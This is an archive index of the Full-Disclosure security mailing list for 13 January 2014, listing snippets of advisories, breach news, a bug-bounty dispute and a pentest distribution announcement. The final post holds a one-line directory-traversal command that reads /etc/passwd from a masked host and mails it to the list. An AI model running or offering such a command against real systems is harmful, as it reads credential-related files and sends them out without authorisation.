Re: [Full-disclosure] Microsoft Twitter accounts, blog hijacked by SEA

2014-01-13 Thread Mohammad Hosein
respectfully , almost a whole country+1 pwned with a retard wmd trick and many massacres later they don't look embarrassed or anything . why would a targeted attack by extremely skilled n determined dudez on a lame big biz be embarrassing ? btw , not into "the next big thing" theme -- but like to a

[Full-disclosure] [SECURITY] [DSA 2843-1] graphviz security update

2014-01-13 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2843-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 13, 2014

[Full-disclosure] Microsoft Twitter accounts, blog hijacked by SEA

2014-01-13 Thread Georgi Guninski
http://www.theregister.co.uk/2014/01/13/microsoft_twitter_blog_sea_compromised/ > Another week, ANOTHER security own goal for Redmond > Microsoft had two Twitter accounts and an official blog compromised over the > weekend in another embarrassing security incident for the Redmond giant. Cheer

[Full-disclosure] [SECURITY] [DSA 2842-1] libspring-java security update

2014-01-13 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2842-1 secur...@debian.org http://www.debian.org/security/ Markus Koschany January 13, 2014

[Full-disclosure] List Charter

2014-01-13 Thread John Cartwright
[Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and the

[Full-disclosure] [ MDVSA-2014:001 ] kernel

2014-01-13 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:001 http://www.mandriva.com/en/support/security/ __

Re: [Full-disclosure] Yahoo Bug Bounty Program Vulnerability #2 Open Redirect

2014-01-13 Thread Stefan Schurtz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi Kenneth, thanks for your information. I make it public because it seems a open redirect isn't a problem or bug for Yahoo! Security. And as you can see in my advisory or on the Yahoo Bug Bounty page, open redirects are removed from scope. And I'm n

Re: [Full-disclosure] ObamaCare California Admin Interface Exposed to Entire Internet + more!

2014-01-13 Thread Pedro Luis Karrasquillo
You have screenshots of this that you can share? links have been disabled now. I would like to post this in my blog if the lot of you do not mind. Date: Thu, 9 Jan 2014 11:28:12 -0800 From: whitehat.whistleblo...@gmail.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ObamaCare

Re: [Full-disclosure] Yahoo Bug Bounty Program Vulnerability #2 Open Redirect

2014-01-13 Thread Kenneth F. Belva
Just as an FYI, I also reported this exact bug to Yahoo! in November on 11/21/2013 as part of the BugBash at OWASP AppSecUSA 2013 through BugCrowd, prior to your December 13th disclosure date to Yahoo. As part of my discussions with Yahoo! Security on this issue I was told that it was reported to

[Full-disclosure] BlackArch Linux

2014-01-13 Thread BlackArch Linux
BlackArch Linux is an Arch-based GNU/Linux distribution for pentesters and security researchers. The BlackArch package repository is compatible with existing Arch installs. Here is our website: http://www.blackarch.org/ Here are some of BlackArch's features: - Support for i686 and x86_64 archi

[Full-disclosure] Sex links fail

2014-01-13 Thread Marshall Whittaker
links xxx.xx.xxx/../../../../../../etc/passwd -dump|mail -s "HOPE userz" full-disclosure@lists.grok.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secun